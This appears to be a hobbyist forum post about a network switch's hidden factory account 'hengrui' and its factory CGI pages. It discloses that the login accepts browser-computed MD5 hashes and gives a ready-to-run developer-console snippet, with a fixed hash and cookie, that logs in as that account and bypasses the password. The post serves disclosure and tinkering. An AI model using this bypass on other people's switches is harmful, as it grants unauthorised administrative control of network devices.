I didn't get the hengrui password and login_ft.cgi to work. You can access the the factory methods using the admin credentials by cgi (attached is an example of changing the colour to pink)
/ftdft.cgi
/ftlogo.cgi
/ftcolor.cgi
...
After a mini adventure - flashing the wrong firmware and recovering via a serial adapter (thanks for the tips on how to enter recovery mode)... I had a poke about...
While I haven't got the password for 'hengrui', you don't need it, it's possible to log directly in with the MD5 hashes - the hashes are computed in the browser and the result is sent to the switch for validation... not great!
If you are using these switches anywhere security is a concern then probably the best way to secure this switch is to move all but "trusted ports" off VLAN 1 (which is the only VLAN the web interface can be accessed from) Correction: this doesn't work - as Viper_Rus pointed out - I had screwed up the ports VLAN membership
The login in "hengrui" also has access to the normal admin area too
Visit -
http://{switch ip}/login_ft.cgi
F12 for Developer Tools, then run the following in the developer console
document.login.username.value = 'hengrui';document.login.language.value='EN';document.login.Response.value = '81d57ea79621e8887914f40ee4122185';document.cookie = 'admin=81d57ea79621e8887914f40ee4122185';document.login.submit();
this login has some of the "hidden" factory settings that up-n-atom found, if you remove Hengrui_mp_cfg from the URL, you are back in the normal admin area
Rich